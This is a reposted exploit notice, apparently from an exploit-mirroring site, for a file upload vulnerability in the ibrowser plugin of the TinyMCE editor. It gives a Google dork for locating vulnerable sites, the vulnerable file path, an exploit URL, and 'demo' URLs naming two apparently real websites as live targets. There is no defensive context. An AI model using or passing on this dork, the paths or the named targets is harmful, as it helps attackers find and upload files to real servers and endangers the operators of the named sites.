Tinymce PHP WYSIWYG editor control File Upload Vulnerability

Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010100049

Below is a copy:

===
             Tinymce PHP WYSIWYG editor control File Upload Vulnerability
===
# Exploit Title:WYSIWYG editor control File Upload Vulnerability
# Date: 09-10-2010
# Author: _aL_Bayraqim_
# WebSite: www.1923Turk.com
# Bordo Bereliler Grup Komutanligi
# _aL_Bayraqim_ Corti - Aytug_Han Montesque - Em3rGeNcY - KaraBulut
# Software Link: http://www.j-cons.com
# Revision: 11346 Date: 2004/10/04
#
###
===[  Vulnerable File ]===
Google dork: "inurl:/tiny_mce/plugins/ibrowser/ibrowser.php"
/tiny_mce/plugins/ibrowser/ibrowser.php
 
===[ Exploit ]===
 
http://www.site.com/path/include/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php
 
===[ Demo ]===
 
http://www.schachbund.de/news/include/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php

http://www.gnorpen.com/editor/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php
###

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.